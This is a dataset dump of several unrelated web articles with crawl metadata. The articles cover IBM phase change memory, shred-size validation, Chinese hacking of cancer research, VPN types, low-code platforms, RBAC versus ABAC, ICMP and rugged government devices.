text
stringlengths
234
589k
id
stringlengths
47
47
dump
stringclasses
62 values
url
stringlengths
16
734
date
stringlengths
20
20
file_path
stringlengths
109
155
language
stringclasses
1 value
language_score
float64
0.65
1
token_count
int64
57
124k
score
float64
2.52
4.91
int_score
int64
3
5
There is no question that the memory hierarchy in systems is being busted wide open and that new persistent memory technology that can be byte addressable like DRAM or block addressable like storage are going to radically change the architecture of machines and the software that runs on them. Picking what memory might go mainstream is another story. It has been decades since IBM made its own DRAM, but the company still has a keen interest in doing research and development on core processing and storage technologies and in integrating new devices with its Power-based systems. To that end, IBM Research is announcing that it has successfully created and tested phase change memory (PCM), an alternative storage that sits between DRAM and flash on the memory hierarchy much like the 3D XPoint memory developed by Intel and Micron Technology, that stores three bits per memory cell – an important development if the cost of PCM is to be brought down to be more competitive with DRAM and flash. IBM is also showing off a second generation of PCM memory cards that it has developed using existing PCM technology and coupled very tightly to its Power8 systems using its Coherent Accelerator Processor Interconnect (CAPI) interface. Phase change memory has been in development since the 1970s, and is one of the many contenders as an adjunct to DRAM and flash in the memory hierarchy. As the name suggests, the ones and zeros in binary data storage are induced by a phase change in a material, in this case an alloy called chalcogenide that has a mix of antimony, germanium, and tellurium that with the application of heat can be induced into a crystalline or amorphous state, and data can be stored in either state which is extremely useful. Micron originally developed its first generation of PCM memory chips for smartphones because PCM is extremely fast and uses very little power compared to flash, but it is based on a complex substance and is difficult to manufacture. So driving up the bit density, and therefore the overall capacity, of PCM is an important step towards commercializing this technology. That said, given the relatively low storage density of PCM compared to flash and perhaps 3D XPoint, it stands to reason that PCM may be relegated to the parts of systems where latency of access, persistence of data, a high durability are more important than capacity. PCM can take up to 10 million write cycles, says IBM, compared to about 3,000 write cycles for the kind of flash used in a USB stick these days and falls even lower to maybe 300 to 500 cycles with triple level cell (TLC) flash that is commonly used in enterprise applications. Compared to this flash, PCM has what is effectively an eternal wear level. In any event, up until now, PCM was able to store one bit per memory cell, but a team of researchers at IBM’s lab in Zurich, Switzerland have demonstrated they can store two bits per cell and a path to three bits per cell – equivalent to the density of modern flash memory. The PCM research is being led by Haris Pozidis, manager of non-volatile memory systems at IBM Research, and the team’s findings are being presented in a paper at the International Memory Workshop in Paris. “Phase change memory is the first instantiation of a universal memory with properties of both DRAM and flash, thus answering one of the grand challenges of our industry,” Pozidis said with regard to the research that IBM has been doing. “Reaching three bits per cell is a significant milestone because at this density the cost of PCM will be significantly less than DRAM and closer to flash.” This is, of course, precisely the part of the memory hierarchy that Intel and Micron are pursuing with their 3D XPoint memory, which many speculate is based on resistive RAM (ReRAM) technologies, not PCM. At this time, 3D XPoint is implemented using a 20 nanometer process and stores data at a density of one bit per cell (SLC) and a 7 microsecond latency for reads and delivers on the order of 78,500 IOPS in a 70/30 read/write mix that is typically used to characterize storage. (These stats are courtesy of Chris Mellor over at our sister publication, The Register.) DRAM access is on the order of 200 nanoseconds, or about 35X faster than Intel’s Optane 3D XPoint, but 3D XPoint is about four times faster on writes than a PCI-Express flash unit using the trimmed down NVM-Express protocol and about twelve times faster than this flash on reads. To push the limits on PCM and push it up to MLC and then TLC densities, IBM created its own 2×2 Mcell array with a four-bank interleaved architecture and comprising a 64K cell array, and running it at elevated temperatures and with 1 million set and reset endurance cycles was able to show two bit per cell storage and a means of delivering three bits per cell. To accomplish this feat, IBM has come up with a set of metrics that can monitor the state of the PCM cells that are immune to the effects of the drift in the state of the underlying material and coding and detection methods that are tolerant of this drift and therefore prolong the longevity of the storage as its density is increased. It is unclear how this research will be used to improve actual PCM devices, but IBM is always interested in licensing its technology. In the meantime, Big Blue is showing off the second generation of PCM cards interfacing with its Power8 systems and delivering much better performance than is possible with flash storage. Back in early 2014, IBM researchers partnered with Micron and FPGA maker Xilinx to create a PCM server card based on Micron’s P5Q PCM chips under Project Theseus. These 128 Mbit PCM chips are manufactured in very mature 90 nanometer techniques by Micron and cycle at 66 MHz. The P5Q chips have very asymmetric read and write performance, with writes taking about 1.15 milliseconds and reads taking about 75.25 microseconds, which translates into 860 operations per second on writes and 13,290 operations per second on reads. This first generation card married a Xilinx Zynq-7045 FPGA board (which was programmed as a memory controller) with two channels of PCM memory, which delivered 65,000 read IOPS at a latency of 35 microseconds and 15,000 write IOPS at a latency of 61 microseconds, and importantly for applications that require consistency of performance, 99.9 percent of the I/O requests were completed within 240 microseconds, which was 12X better than MLC flash devices and 275X better than TLC flash devices that IBM tested two years ago. With its second generation PCM prototype, IBM was specifically interested in testing how to link PCM memory in a PCI-Express form factor would perform when linked to the Power8 processor complex using CAPI ports. This new card was implemented using the same P5Q PCM memory from Micron. IBM also tested a next generation PCM card that emualted PCM using DRAM and then put the memory on a DDR3 interface, which is scenario two in the chart below: With the CAPI interface, the older P5Q PCM memory card was considerably faster than the original implementation that IBM did two years ago in its initial tests. As you can see, the performance is pretty high and also predictable: And with the improved PCI-Express card, which puts the emulated PCM memory on DIMMs that plugs them into the FPGA card, the latency drops even further and the gap closes a bit between reads and writes, too: It will be interesting to see how actual PCM memory does compared to this emulated PCM memory. But with the emulated PCM, IBM says that it is working to squeeze more performance out of the CAPI-FPGA-PCM stack by optimizing its protocols and is looking to support multiple PCM channels on the cards (as it did with its initial experiments two years ago) to boost the throughput and capacity of the PCM memory. Now, when the next generation PCM is actually available, IBM and its partners will be ready to roll it into production. It is unclear what IBM’s plans are with regard to 3D XPoint memory, but anything it is doing with PCM is can, in theory, do with 3D XPoint. While Intel is expected to emphasize its Optane SSD and DIMMs for its own Xeon systems, Micron can sell its portion of the 3D XPoint memory coming out of their joint operations to whomever it chooses. Micron has been mum on precisely what its plan is here, but it is likely that some OpenPower partners, such as Alpha Data who made the PCI-Express cards used in the CAPI tests above, could integrate any number of different memory technologies on their FPGA cards and create controllers to drive them and act as an interface to the Power8 compute complex through CAPI.
<urn:uuid:ec17e3bd-b164-4118-b308-d32784bafc74>
CC-MAIN-2024-38
https://www.nextplatform.com/2016/05/17/ibm-gets-behind-phase-change-memory/
2024-09-09T01:27:46Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651053.52/warc/CC-MAIN-20240909004517-20240909034517-00743.warc.gz
en
0.961659
1,885
3.125
3
SHRED SIZE VALIDATION with VIZION Where physical destruction of storage media is concerned, shredding is one of the most used techniques. The speed at which storage media is rendered inoperable is one of the attractions to this process, with only laboratory based data recovery techniques being viable to recover data. The techniques which could be applied to shredded material are typically: - Platter level recovery using Magnetic Force Microscopy. - Decapsulation on shredded NAND cells. - Chip readers for intact NAND cells post shred. Countermeasures to these techniques are typically to specify a shred size which renders these types of attack unfeasible. Due to the nature of the storage media, there are different size expectations for the size of the particles which are the output from a shredding process based on the ability to recover data. There are standards which specify the size of shredded material including ISO / IEC 21964 which specifies a particle size by media type and security level. Vizion is a blend of high-resolution imagery using a light box and camera followed by an analysis process using proprietary software which is able to measure the two longest lengths of the particle size and compute the surface area. Even for irregular shapes, the software is able to accurately identify the particle area.
<urn:uuid:b2f467e8-daea-4cc6-8f60-30e481dabdf8>
CC-MAIN-2024-38
https://adisarc.com/vizion/
2024-09-10T08:19:08Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651224.59/warc/CC-MAIN-20240910061537-20240910091537-00643.warc.gz
en
0.927207
264
2.71875
3
After China’s cancer rate surged in recent years, Chinese authorities went looking for an answer to the problem. They appear to have found a useful tool in the country’s cyber capabilities. Over the last two years, Chinese government-linked hackers have targeted organizations involved in cancer research on multiple occasions, cybersecurity company FireEye said in a report published Wednesday. In at least one case, more than one group has gone after the same organization — evidence of a relentless pursuit of research data. “It makes sense when you look at the larger context that China’s operating in,” said Luke McNamara, principal analyst at FireEye, referring to the cancer scourge in China and the resulting social costs. In one incident in April, Chinese hackers targeted a U.S.-based cancer research organization with a malware-laced document referencing a conference the organization hosted. A year earlier, the newly-named Chinese hacking outfit APT41 spearphished employees of the same entity. The hunt for cancer research appears to have gone beyond American organizations. In late 2017, APT10 — which U.S. officials have tied to China’s civilian intelligence agency — went on an expedition against health care organizations in Japan with documents related to cancer research conferences, according to FireEye. Cancer research is but one segment of the medical sector allegedly pursued by these groups. Device manufacturers and other intellectual property-rich vendors have also found themselves in the crosshairs. “Targeting medical research and data from studies may enable Chinese corporations to bring new drugs to market faster than Western competitors,” the FireEye report says. The Chinese Embassy in Washington did not immediately respond to a request for comment. China has denied allegations that it uses hacking to advance its economic goals. China is the most notable sponsor of health care-focused espionage named in the FireEye report, but not the only one. A handful of other examples include Russian military hackers’ attacks on anti-doping agencies, which resulted in an indictment by the U.S. Department of Justice last year, and Vietnam’s APT32 going after a British health care organization. A trove of health data for spying Hackers have demonstrated an interest in collecting health records in bulk in recent years. The data is coveted by spies because it can be used to build a profile of foreign officials’ frailties, for example. Two of the more prominent breaches of insurance and health care organizations allegedly involve Chinese hackers. In May, U.S. prosecutors unsealed an indictment of a Chinese national related to the 2015 hack of health insurer Anthem that exposed personal information on nearly 79 million people. In July 2018, Singapore announced that hackers had accessed the personal information of 1.5 million patients of the country’s health care system in what authorities labeled a foreign government operation. In its report Wednesday, FireEye said the Singapore breach bore the fingerprints of a Chinese espionage group that has attacked media, government, and transportation organizations in Southeast Asia, among others.
<urn:uuid:0a2cbcfd-99b7-4499-a3a4-724b157b7e0b>
CC-MAIN-2024-38
https://develop.cyberscoop.com/china-cancer-research-hacking-fireeye/
2024-09-15T06:59:28Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651616.56/warc/CC-MAIN-20240915052902-20240915082902-00243.warc.gz
en
0.952543
625
2.53125
3
One of the most important parts of your network security when it comes to devices connecting through the internet is a virtual private network (VPN). There are a number of things that can cause risk when it comes to online activities. Two of these are connections to your network from remote employees and when users on your network connect to the outside world. Anytime a device is using a connection, it can open a portal that leaves data transmissions at risk of being compromised and that leaves a network vulnerable to a hacker. 28% of data breaches are caused by weak remote access security. A VPN is a way to secure those network connections by adding a layer of encryption to the traffic being transmitted and also controlling network access. But all VPNs are not the same. Two distinct versions of VPNs are those that are firewall-based, Office VPNs, and those that are Anonymous VPNs, typically provided as an application. We’ll break down each type below, so you’ll understand their uses and how they can be applied to your cybersecurity needs. How Does an Anonymous VPN Differ from an Office VPN? There are several factors that go into the choice between an office VPN and anonymous VPN. These include considerations of cost, reliability, and security. One of the main differences between the two types of virtual private networks is that an office VPN, which is firewall-based, is controlled locally, where an anonymous VPN is controlled by a third-party provider. Here is an overview of both types. Firewall-based Office VPN With the office VPN, you are getting a combination of a network firewall and virtual private network in one. Firewalls are designed to protect your internal network by monitoring all traffic coming in and going out. The VPN gains added security from the firewall processes, such as address translation, user authentication, alarms, and monitoring. Companies can have either a hardware or software firewall. A hardware-based firewall is a piece of equipment connected to their office network. Software firewalls use an installed application instead to provide firewall protection. The VPN part of the firewall can either be placed first, in front of the firewall. Or it can be done with the firewall as the outer ring of protection. An anonymous VPN is the one you’re looking at when you see products like NordVPN or ExpressVPN. They’re marketed to both consumers and business users. This type of VPN makes your IP address anonymous. Instead of a website that’s being visited seeing your router’s IP address, it sees the IP address of the VPN provider’s server that you’re using to connect. This type of VPN involves downloading software onto a device and turning it on. Once on, it secures connections that device is making. How Each VPN Protects Traffic An office VPN is like having a team of sentries stand guard over your network and ensure only approved traffic is coming in and out and that the traffic is secure. An anonymous VPN is device-based and is more like a shield that a soldier would carry around to protect them. As you connect online it secures that connection. You have much more control of security policies and user authentication when using an office VPN. For example, you have the ability to set up challenge questions or other modes of authentication before allowing a remote user to connect to the VPN. When you’re using an anonymous VPN through a 3rd party provider, your options are more limited. Most of these have a simple username/password login and the ability to add multi-factor authentication, but you don’t have the same policy controls. When it comes to cost, the anonymous VPN is the most economical. This is because it’s a monthly service that you’re paying for per user, similar to a cloud service subscription. Firewall-based VPNs are usually an outright purchase when you buy the firewall, although software-based ones can offer significant savings over hardware firewall/VPNs. Speed and Reliability Because office VPNs are locally connected to your network to secure remote traffic, they tend to be faster and more reliable than VPNs hosted on a provider’s server. With an anonymous VPN, you’re relying on the service provider’s server entirely. The speed and reliability can be hampered by things like how far away the server is and how many other users are accessing it. Ease of Use Once set up, an office VPN can be just as easy to use as an anonymous VPN. However, to take advantage of the flexibility for customization, there is generally more setup work involved than there is with an anonymous VPN, which can be used “out of the box” pretty quickly. Which VPN is Right for Your Company’s Needs? You don’t want to guess when it comes to deciding which VPN to use. Instead, contact C Solutions. We can do a full assessment of your network protection needs and recommend the best VPN to match those. Schedule a free network assessment today! Call 407-536-8381 or reach us online.
<urn:uuid:878d839d-6224-4a80-a9f7-e081abd9ea2b>
CC-MAIN-2024-38
https://csolutionsit.com/office-vpns-vs-anonymous/
2024-09-18T21:29:58Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651941.8/warc/CC-MAIN-20240918201359-20240918231359-00843.warc.gz
en
0.950464
1,058
2.703125
3
As described on Wikipedia: Low-code development platforms (LCDPs) allow the creation of application software through graphical user interfaces and configuration instead of traditional procedural computer programming. The platforms may focus on design and development of databases, business processes, or user interfaces such as web applications. Such platforms may produce entirely operational applications, or require or allow minimal coding to extend the applications functionality or for uncommon situations. Low-code development platforms reduce the amount of traditional hand-coding, enabling accelerated delivery of business applications. A common benefit is that a wider-range of people can contribute to the application’s development, not only those with more formal programming experience. LCDPs also lower the initial cost of setup, training, and deployment. Low-code development platforms employ visual, declarative techniques, which define data, logic, flows, forms and other application artifacts, without writing code, according to Forrester Research. Imagine Lego blocks for software application development. Developers may code to integrate access to older applications, for reporting, and to customize for special user interface (UI) requirements, Forrester analyst John Rhymer wrote in an October 2017 research report. Why is There a Shift from Traditional Coding to Low-Code? Low-code development platform has been gaining widespread tractions from enterprises worldwide to tackle challenges witnessed in traditional coding with programming languages. 1.Difficult to meet desired timeline complementing go-to-market strategy: Every business unit is crafting its digitization needs and roadmap, yet, time is a fixed constraint. It is challenging to have speedy go-to-market products with traditional coding. Proof-of-concept (POC) with minimal viable product (MVP) is often taking more time than justifiable. 2.Lack of agility: Change is inevitable in business, so embrace it. The lack of configuration tools for form and process flow changes is making it challenging for programmers to adapt with business rule changes, as it often leads to longer development time and to some extends, unmanaged scope-creep. 3.High long term maintenance costs: Compared with changes through configuration, an application system developed from coding with programming languages and frameworks will require development continuity and support by qualified and experienced full-stack software engineers. Knowledge and technology transfer from application creator to another person will also require prerequisites for extensive programming competency. Thus, the long-term maintenance cost of such application system also includes the costs associated with talent retention. Otherwise, when maintainability falls-out, the application system eventually suffers along with higher technical debts. When every feature is developed from coding, a commonly used user interface component such as pagination table with search filters could also present programmatic bug. How to Compare Low-Code Development Platform? Implementing a software isn’t difficult; often, it is only the beginning. Maintaining and sustaining it is the tricky question. We have published an evaluation checklist that covers the following aspects: - App Development - App Maintenance - Ecosystem and Support
<urn:uuid:4a2db932-3957-4125-9086-2d3644ae2d5d>
CC-MAIN-2024-38
https://innov8tif.com/what-to-look-out-for-when-evaluating/
2024-09-18T20:22:02Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651941.8/warc/CC-MAIN-20240918201359-20240918231359-00843.warc.gz
en
0.938664
625
2.640625
3
Data breaches and cyberattacks happen daily, across industries and to businesses of all sizes. However, as these attacks become more sophisticated, companies admit that they are at a loss on how to best protect the data. According to eWeek, a study from RSA shows that those responsible for protecting the network don’t necessarily trust their information security capabilities. The Cybersecurity Poverty Index survey revealed that four in 10 companies admitted that their security capabilities were “functional,” or, in terms of the survey, average. In all, approximately 75 percent of the 400 companies interviewed confessed that their security abilities were either average or below average when compared to the standards suggested by the Cybersecurity Framework, which was developed by the U.S. National Institute of Standards and Technology. The RSA study used five areas to measure information security capabilities, as eWeek reported: The five components of an information-security program include identifying threats, protecting information assets, detecting attacks, responding to incidents and recovering from compromises. According to InfoSecurity Magazine, a second study conducted at RSA, this one from Venafi, found a serious disconnect between actual information security capabilities and what IT professionals choose to believe. The 2015 RSA Conference survey showed that often IT organizations are too trusting of certificates and cryptographic keys: [M]ost security departments and systems blindly trust keys and certificates, which leaves enterprises unable to determine what is ‘self’ and trusted in their networks and what is not, and therefore dangerous. This means that cyber-criminals can use them to hide in encrypted traffic, spoof websites, deploy malware and steal data. This study revealed that IT support staff struggles to detect and correct compromised certificates or keys. The survey found that 78 percent of respondents only conduct a partial remediation due to their implicit trust in the security capabilities of keys and certificates. And to make things worse, most companies have no strategy in place to handle a security incident involving vulnerable keys and certificates, which weakens information security capabilities even more. Most businesses reported that they are most confident with the most traditional methods of security—primarily protecting the perimeter and the data inside the perimeter—at a time when this type of protection is less effective. But where confidence is truly lacking is in the maturity of the security systems and their ability to defend from a more sophisticated attack. Weak security may be the one area where large and small companies are on equal footing. Organizations of all sizes appear to struggle with putting adequate security tools in place. While part of the reason for this struggle has to do with the lack of funds—most security experts admit that security remains near the bottom of the IT-funding list despite the threat risk—a greater reason is that in-house staff isn’t able to keep up with the ever-evolving sophistication of the attacks. Organizations are not adequately protecting all of the data at multiple points. There can be no excuses for not being confident in information security capabilities in today’s threat environment. Too much is at risk for both the enterprise and its customers. If organizations aren’t comfortable enough with the security systems currently in place, it may be time to look for help from outside. Sue Marquette Poremba has been writing about network security since 2008. In addition to her coverage of security issues for IT Business Edge, her security articles have been published at various sites such as Forbes, Midsize Insider and Tom’s Guide. You can reach Sue via Twitter: @sueporemba
<urn:uuid:b4a17c58-39c0-4f62-9d8b-5bfee1bbf9f3>
CC-MAIN-2024-38
https://www.itbusinessedge.com/networking/confidence-in-information-security-capabilities-is-lacking/
2024-09-18T22:44:22Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651941.8/warc/CC-MAIN-20240918201359-20240918231359-00843.warc.gz
en
0.960787
713
2.65625
3
Controlling access to devices and resources is one of the most basic protections an enterprise needs to have in place to stay secure. Implementing access controls minimizes the exposure of key resources and helps you to comply with regulations in your industry. Currently, there are two main access control methods: RBAC vs ABAC. RBAC stands for Role-Based Access Control and ABAC stands for Attribute-Based Access Control. In this article, we’re going to look at what RBAC and ABAC are, and what is best for managing user access to resources. What is RBAC? RBAC is a method that manages access controls based on roles. A network administrator will determine the access privileges of a role such as whether the role can create and modify files or is restricted to reading. Under RBAC, the role employees are given determines what resources they have access to. The level of access can be influenced by the seniority of the users in question and whether the materials are critical to their everyday work. When using RBAC, it’s best practice to restrict access to resources unless they’re absolutely necessary for a particular role. This limits the risk of data leaks. In other words, employees should only have access to the systems and materials needed to carry out their jobs — and nothing more. This minimizes the risk of an asset being compromised. There are four levels of role-based access control that can be implemented: - Flat RBAC – All users and permissions are assigned roles. A user must take on a role to obtain the permissions needed. As a consequence, a user can be assigned multiple roles to have multiple permissions. Roles can be assigned to multiple users. - Hierarchical RBAC – Adds a hierarchy to the role structure that sets out relationships between roles. Higher seniority roles acquire the permissions of junior roles. - Constrained RBAC – Adds a separation of duties so that multiple users must complete a single task to ensure that no malicious changes can be made to your system. - Symmetric RBAC – The company periodically reviews the permissions associated with each role. An administrator can pull permissions from one user and then reassign them to another individual. What is ABAC? ABAC uses attributes, a set of labels and properties, to determine who has access to what resources. Attributes include attributes of the subject, attributes of objects, environmental conditions, and policies. In practice, attributes can include everything from the position of employees to their departments, IP addresses, devices, and more. For example, an administrator could restrict access to a resource by setting one of the attributes to role = supervisor and another as department = marketing. These attributes act as conditions and determine what a user needs to have access to a resource or system. Access can be controlled by using the eXtensible Access Control Markup Language (XACML) to set access control rules. The model uses Boolean logic following an IF, THEN format that decides a user’s access based on the attributes. The process is automated which makes an efficient way of managing access permissions as an administrator doesn’t need to continually assign or reassign roles to users. What’s the difference between RBAC vs ABAC? The main difference between RBAC and ABAC is that the former is role-based and assigns permissions based on role, and the latter is attribute-based, and grants access based on attributes that change in real-time. For example, if employees are moved to a different department, current permissions can automatically be revoked and they can immediately be granted access needed to do their new roles. ABAC is mostly used by larger enterprises because of its complexity. It takes time to define the attributes needed for the system to function. However, once ABAC is configured then it’s much more efficient than RBAC because the entire process is automated. How can I choose between the two? The choice between the two depends on what your use case is. If you want to make simple and broad access role decisions then RBAC is a natural choice. However, if you need to add lots of specific restrictions and access conditions then you should use ABAC. As a general rule of thumb, you should implement RBAC before ABAC. The reason is that both RBAC and ABAC act as filters. If RBAC can sufficiently control access to your key resources then there’s no point paying for the extra ABAC. It is important to note that you can also take the hybrid approach and use both RBAC and ABAC. We’re going to look at the advantages and disadvantages of each solution in further detail below. Benefits of RBAC While RBAC may not be as cutting edge as ABAC, it still has a set of entrenched advantages for managing access permissions. These are as follows: - Increased efficiency - Lower risk of data breaches - Regulatory compliance - Lower costs A key advantage of RBAC is that it’s more efficient. You can add new roles and edit existing roles quickly, which allows you to onboard new staff quickly. Another is that controlling access to sensitive data lowers the risk of data breaches. Gatekeeping access to sensitive data lowers the risk of your falling victim to a cyber attack. The increased efficiency also helps from a compliance perspective, as it enables you to verify that you’re keeping sensitive data private. It’s also simple enough that you can see how employees interact with data. This is invaluable for making sure that you don’t fall foul of any regulations in your industry. RBAC can also be used to reduce costs by limiting access to certain resources. For example, if you stop employees from accessing a bandwidth-intensive application then you will be able to preserve other resources like your network bandwidth. Limitations of RBAC Although RBAC does come with many benefits, it isn’t without some significant disadvantages; these are: - Role explosion One of the biggest problems RBAC has is that of role explosion. If you’re in an environment with lots of roles with unique permissions then it can be difficult to manage all the roles your team needs to work effectively. It is here that the automated nature of ABAC stands out as a better alternative. While RBAC can be efficient, it can also be difficult to manage when compared to ABAC because it isn’t automated. It becomes very difficult to manage if administrators add roles to users without removing them. It’s not uncommon for users to end up with multiple roles and permissions that all need to be proactively managed or they can easily spiral out of control. If your company onboards a lot of new hires then you’re going to find it very difficult to upscale when using RBAC. You’ll need to define new roles for each hire, which will include lots of manual legwork. ABAC has a number of benefits for managing permissions: - Automatically updates permissions - Less admin Users don’t have to manually manage roles with ABAC, instead, they can define attributes and automate the system. The system permits or denies access requests based on the attributes of the user and the object. So once the attributes of users change, so do the materials they can access. Users only need to change attribute values rather than change the relationships between subjects and objects. ABAC comes with less admin (at least after it’s set up!). With access permissions changing automatically as user attributes change there’s less administration when onboarding new users. For example, you don’t need to assign authorization to subjects before they try to access material. There are also security advantages to using ABAC, such as being able to restrict users from accessing resources on unknown devices. This provides administrators with another buffer of security so they can make sure that users have to use secure devices to interact with important services. Although ABAC does have some distinct strengths, it isn’t without its drawbacks: - Difficult to audit ABAC can become very complex to configure, particularly in environments with lots of information sharing. An administrator has to specify lots of policies to determine what attributes users need to have to access resources. Trying to manage attributes for all users can be a challenge. Another key challenge is that ABAC is very difficult to audit. For security and regulatory compliance, it’s important to be able to see the exact resources a user has access to. With RBAC this is easy as you can just look at the privileges the user has been assigned. With ABAC you’re rarely able to look up users and see what they have permission to access, as you’d have to check each object against the access policy. The scalability of ABAC remains unclear. Systems with hundreds or thousands of users are extremely difficult to manage and consume a significant footprint of system resources. Do what’s best for your access control process No matter what route you choose to lean in the RBAC vs ABAC debate, you need to have a concerted plan in place to determine your access control process. Without access controls, there’s nothing to stop an employee from accessing sensitive data. Adhering to the principle of least access and making sure that employees only have access to the essentials lowers the risk of you running into any cybersecurity issues and losing important data. Pick an access control methodology that works for your environment. If the simple approach of RBAC works for you then stick with that. If you want more efficiency with automation then ABAC is worth taking a look at. RBAC and ABAC FAQs Is ABAC better than RBAC? The option to name attributes as access control conditions give ABAC more flexibility than RBAC. The option to introduce multiple conditions in one rule is very powerful but that means the ABAC system needs a lot of planning. So, for large businesses that have a specialist on staff, this is probably the winner. Smaller businesses with a more straightforward staffing hierarchy would be better off sticking with RBAC. What is ABAC access control model? ABAC stands for Atrribute-based Access Control. It provides a range of conditions that can be used to test whether a connection should be allowed or blocked. The system is so complex that it is implemented with its own language, called the eXtensible Access Control Markup Language (XACML). XACML rules can draw on environmental conditions instead of just user or address circumstances. Is ABAC rule-based? An ABAC filter is like a series of IF statements – each line is a rule. So, attribute-based access control is a rule based system.
<urn:uuid:039facd7-a715-449e-973e-bbc39998b778>
CC-MAIN-2024-38
https://www.comparitech.com/net-admin/rbac-vs-abac/
2024-09-20T04:41:48Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652130.6/warc/CC-MAIN-20240920022257-20240920052257-00743.warc.gz
en
0.939054
2,208
3.03125
3
ICMP stands for the Internet Control Message Protocol. It is a primary protocol in the Internet Protocol Suite. It is used by network devices to relay an error message and management queries. It helps to reroute the message to its right course. The ICMP is the best-known protocol for the PING command in Windows and Unix OS. The ICMP protocol is also considered an essential part of IP. However, it is built upon IP (it relies on IP to transmit its data from one end to another end). Thus ICMP, ICMP must be implemented in all IP modules. The general role of the ICMP is to generate error packets about the network. The ICMP messages are categorized into two: - Error reporting messages - Query messages The two are further categorized into the types of messages. The ICMP messages are relayed in IP datagrams; The IP header always has number 1 (protocol number) showing of ICMP and the type of service 0 for routine. ICMP has numeric message codes. 0: Echo reply 3: Destination not reached or unreachable 4: Source quench 5: Redirect – use a different router 8: Echo request 9: Router advert reply 10: Router solicitation 11: Exceeded time The ICMP header comes after the IPv4\IPv6 packet header it is then termed as IP protocol number 1. The complex protocol contains three fields: Type – Identifies an ICMP message, if an error or query message Minor code – it provides more information about the kind where it goes to further into the types of messages within either the query or report messages. Checksum – helps detect the errors introduced during transmission. - ICMP may report errors in any IP datagrams in exception of ICMP messages to avoid repetitions. - ICMP messages are sent only to errors on fragment zero when it comes to IP datagrams that are fragmented, in that, ICMP messages do not refer to IP datagrams having a non-zero field of offset. The ICMP Structure Whenever any router ricochets back an ICMP packet to report any errors, it recreates every field in the original IP headers of the packages they are reporting on. This is a standard packet with lots of data passed through it and has an ICMP section in it. An ICMP tunnel has to be programmed for this to take place. Internet Control Message Protocol can be blocked due to attacks which could be prevented through: - Website applications - Detection Systems that detect any intrusion - Blockage of all the ICMP activities from the main network point. ICMP, therefore, gives back a little feedback on communications when things go wrong. It is used in exchanging information from one host to another host on the state of the internet and not transferring of data. The conditions provoking the ICMP packet are mostly due to the results found in the IP header of the failed packets. Its messages are carried by IP packets, so it exists at a higher level than operating structures of switches. The ICMP is none existent in any data-carrying packages. The ICMP is used mostly by administrators of networks to enhance internet connections in diagnostic utility. Related – ICMP vs IGMP
<urn:uuid:5052f3f8-9f7b-4a00-85f9-4e904115b49e>
CC-MAIN-2024-38
https://networkinterview.com/what-is-icmp/
2024-09-10T10:30:02Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651241.17/warc/CC-MAIN-20240910093422-20240910123422-00743.warc.gz
en
0.908374
675
3.984375
4
Photographs Courtesy of the U.S. Forest Service Protecting and managing 191 million acres of land is truly rugged work. Each year, hundreds of U.S. Forest Service field engineers go deep into the nation's forests and grasslands to collect data on natural resources and wildlife to be used in a variety of surveys and projects. For decades, the Forest Service has equipped its fieldworkers with rugged devices that meet military specifications — units that can withstand shock and extreme temperatures and are impervious to dust, upgrading the devices as technology has improved. "Our handheld devices are subjected to a high degree of punishment. They've been dropped off bluffs, submerged in mountain streams, even carried 150 feet high into trees to record insect counts," says Art Clinton, National Mobile Computing Program Manager for the Forest Service, an agency of the Agriculture Department. This means that any rugged device the Forest Service provides for its fieldworkers must not only meet current military standards, but also be dustproof, water-resistant and shock-resistant. The device must have enough battery life for a full day's mission, and screen resolution viewable in bright sunlight. The agency also requires such devices to have ergonomic input features. Until 2007, Forest Service engineers primarily used rugged handheld computers with embedded GPS. As the agency's mission has expanded over the past several years to include fire and aviation, stream surveys in water, avalanche surveys and timber data collection in Alaska, the technology has become even more rugged. In 2007, for example, the agency equipped all of its law enforcement officers with in-vehicle rugged notebook computers. It also has some rugged ultra-mini PCs and some rugged PCs that can convert into tablets or slates. The use of rugged and semi-rugged mobile devices from manufacturers such as Panasonic, Getac and General Dynamics has grown considerably over the past several years. Typically, government users are fieldworkers who are exposed to harsh conditions — such as extreme temperatures and environments with large amounts of dust and other particulates or vibrations — that can adversely affect the performance of mobile devices that are not designed to operate in these environments. "We have witnessed significant advances in terms of overall industrial design and ergonomics of these devices," says David Krebs, vice president for enterprise mobility and connected devices at VDC Research. "While rugged devices will always be heavier than similar-sized, nonrugged devices, the difference is shrinking, especially for devices designed to be more portable, such as tablets. And the drop specification continues to improve as vendors become more aggressive with their product positioning and capabilities." Ruggedization Takes Off Aircraft maintenance personnel at Robins Air Force Base in Georgia have used rugged or semi-rugged notebooks or tablets for several years. The push started in 2009 when a report from the Air Force Inspector General's office called for the use of digitization in the field. When considering what type of mobile devices to provide to aircraft maintenance crews, Air Force officials quickly came to the conclusion that commercial-grade notebooks and tablets wouldn't meet their needs. Handheld devices used by the Forest Service take a lot of punishment, says Art Clinton, the agency's National Mobile Computing Program Manager. Photographs Courtesy of the U.S. Forest Service "They initially bought regular laptops, but they were getting dropped, and they weren't of much use after that," says Gregg Kelley, Robins' program manager for e-tools. "We knew we needed shockproof devices that also had screens that could be read in direct sunlight and could handle the heat and humidity typical of weather in Georgia." After testing hundreds of units with various configurations from a variety of vendors and gathering feedback from maintenance personnel, Kelley's team settled on a few configurations from manufacturers including Panasonic and Getac that met most of its users' needs. Today, aircraft maintenance personnel use rugged or semi-rugged tablets or notebooks. For example, personnel who work under High-Velocity Maintenance, the Air Force's aircraft maintenance program that includes a host of computing-intensive tasks, use notebooks. Those who deal with extracting information from wiring diagrams also use rugged notebooks. For less computing-intensive work, tablets are an economical alternative. Aircraft maintenance workers who handle inventory or expedite orders typically use tablets. Kelley says his group is striving to keep up with technological advances and is considering adopting rugged handhelds for some tasks. He is also looking forward to the introduction of a rugged Windows 8 tablet, as Windows devices are preauthorized for downloading information. Doing the Math With budget-strapped agencies being asked to justify purchases — rugged mobile devices generally cost more than equivalent consumer devices — carefully considering the total cost of ownership is critical. "To truly calculate the TCO, you have to consider the initial price, reduced support and repair costs, reduced downtime, and the capability of the platform to perform the mission," Clinton says. 